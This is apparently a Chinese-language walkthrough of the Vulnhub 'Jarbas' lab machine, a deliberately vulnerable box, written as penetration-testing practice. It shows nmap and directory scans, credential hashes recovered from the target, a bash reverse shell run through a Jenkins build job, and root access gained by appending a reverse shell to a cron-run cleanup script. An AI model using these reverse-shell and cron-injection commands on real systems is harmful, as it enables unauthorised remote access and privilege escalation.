Vulnhub靶场学习之JARBAS

Jarbas: 1
「红队笔记」靶机精讲:JARBAS - Jenkins渗透原理详解,一个典型CMS渗透测试样本。_哔哩哔哩_bilibili

打点

1
nmap -sn 10.0.0.1/24

image.png
本机ip为132,因此目标靶机ip为10.0.0.134
扫端口

1
sudo nmap --min-rate 10000 -p- 10.0.0.134

image.png

1
sudo nmap -sT -sV -sC -O -p22,80,3306,8080 10.0.0.134

tcp、版本、脚本、操作系统
image.png
udp再看下

1
sudo nmap -sU -p22,80,3306,8080 10.0.0.134

image.png
扫描一下漏洞

1
sudo nmap --script=vuln -p22,80,3306,8080 10.0.0.134

80是个服务页面
image.png
8080是个登录页面
image.png
有点眼熟,之前遇到过Jenkins,但是这个版本似乎太老了。
image.png
目录爆破一下80端

1
sudo dirb http://10.0.0.134 

image.png
或者dirsearch

1
python .\dirsearch.py -u http://10.0.0.134

gobuster扫描

1
sudo gobuster dir -u http://10.0.0.134 --wordlist /usr/share/wordlists/dirb/big.txt -xhtml,php

image.png
注意到access.html
image.png
creds 凭据

1
2
3
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98

image.png
image.png
image.png
只有最后这个能登录进去。
创建一个任务
image.png
构建这里测试一下
image.png
直接反弹shell

1
/bin/bash -i >& /dev/tcp/10.0.0.132/4444 0>&1

开启监听

1
sudo nc -lvnp 4444

image.png
构建执行

shell后

image.png
这里收到shell.
image.png
但是发现运行ifconfig无法运行权限不大。
sudo -l看下环境
image.png
可以cat一下/etc/passwd
image.png
能注意到eder有bash,
shadow没法看,crontab可以看。
image.png
查看下脚本,一个删除日志的操作。
image.png
因为是root权限执行,所以这里直接写入脚本即可。

1
echo "/bin/bash -i >& /dev/tcp/10.0.0.132/4443 0>&1" >> /etc/script/CleaningScript.sh

过一会就有shell了:
image.png
image.png